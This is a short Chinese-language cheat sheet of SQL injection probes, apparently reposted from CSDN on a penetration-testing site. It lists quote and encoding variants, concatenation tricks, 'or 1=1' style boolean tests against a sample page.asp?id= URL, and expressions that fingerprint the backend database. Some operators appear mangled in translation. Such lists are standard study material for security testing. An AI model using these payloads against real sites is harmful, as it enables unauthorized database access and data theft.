判断注入
简单字符
\’
%27
\’
22
#
23
;
%3B
)
通配符(*)
apos; # XML 内容必需
编码
%%2727
%25%27
合并字符
`+HERP
\’||\’DERP
“+”帮助
\’\’DERP
‘%20’HERP
“%2B”帮助
逻辑测试
page.asp?id=1 或1=1 — true
page.asp?id=1\’ 或1=1 — true
page.asp?id=1\’ 或1=1 — true
page.asp?id=1 和1=2 — false
数据库类型识别
[\’conv(\’a\’,16,2)=conv(\’a\’,16,2)\’,\’MYSQL\’], [\’connection_id()=connection_id()\’,\’MYSQL\’], [\’crc32( \’MySQL\’)=crc32(\’MySQL\’)\’ ,\’MYSQL\’], [\’BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)\’ ,\’MSSQL\’], [\’@@CONNECTIONS0\’ ,\’MSSQL\’], [\’ @@CONNECTIONS=@@CONNECTIONS\’ ,\’MSSQL\’], [\’@@CPU_BUSY=@@CPU_BUSY\’ ,\’MSSQL\’], [\’USER_ID(1)=USER_ID(1)\’ ,\’MSSQL\’], [\’ ROWNUM=ROWNUM\’ ,\’ORACLE\’], [\’RAWTOHEX(\’AB\’)=RAWTOHEX(\’AB\’)\’ ,\’ORACLE\’], [\’LNNVL(0=123)\’ ,\’ORACLE\’], [\’5:int=5\’,\’POSTGRESQL\’], [\’5:integer=5\’,\’POSTGRESQL\’], [\’pg_client_encoding()=pg_client_encoding()\’,\’POSTGRESQL\’], [\’get_current_ts_config()=get_current_ts_config()\’,\’POSTGRESQL \’], [\’quote_literal(42.5)=quote_literal(42.5)\’ ,\’POSTGRESQL\’], [\’current_database()=current_database()\’ ,\’POSTGRESQL\’], [\’sqlite_version()=sqlite_version()\’ ,\’SQLITE \’], [\’last_insert_rowid()1\’,\’SQLITE\’], [\’last_insert_rowid()=last_insert_rowid()\’,\’SQLITE\’], [\’val(cvar(1))=1\’,\’MSACCESS\’], [\’IIF(ATN(2)0,1,0) 2 和0 之间\’,\’MSACCESS\’], [\’cdbl(1)=cdbl(1)\’,\’MSACCESS\’], [\’1337=1337\’, \’MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL\’],[\’\’i\’=\’i\’\’,\’MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL\’],
以上#WEB渗透和Web突破的相关内容来自互联网,仅供大家参考。相关信息请参见官方公告。
原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/93757.html